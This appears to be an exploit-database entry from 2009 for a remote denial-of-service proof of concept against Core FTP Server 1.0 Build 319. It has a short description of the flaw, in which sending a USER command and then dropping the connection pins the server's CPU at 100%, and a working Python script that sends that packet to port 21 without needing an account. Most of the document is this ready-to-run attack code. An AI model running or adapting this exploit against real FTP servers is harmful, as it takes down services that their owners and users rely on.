Core FTP Server 1.0 Build 319 Denial of Service

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Core FTP Server 1.0 Build 319 Denial of Service
# Published : 2009-12-04
# Author : Mert SARICA
# Previous Title : TANDBERG vF8.2, F8.0, F7.2, and F6.3 Remote Denial of Service
# Next Title : CoreHTTP web server off-by-one buffer overflow vulnerability

# Note: FTP account is not required for exploitation
# http://www.mertsarica.com
# I discovered a denial-of-service vulnerability on Core FTP Server product.
# When you send "USER testrn" and then kills the connection
# immediately, cpu increases to 100% and stays at that level until you
# stop the ftp service.


import socket, sys

HOST = 'localhost'    
PORT = 21             
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

try: 
    s.connect((HOST, PORT))
except:
    print "Connection error"
    sys.exit(1)

try:
    s.send('USER MSrn') # magic packet
    s.close()
    print("Very good, young padawan, but you still have much to learn...")
except:
    print "Connection error"
    sys.exit(1)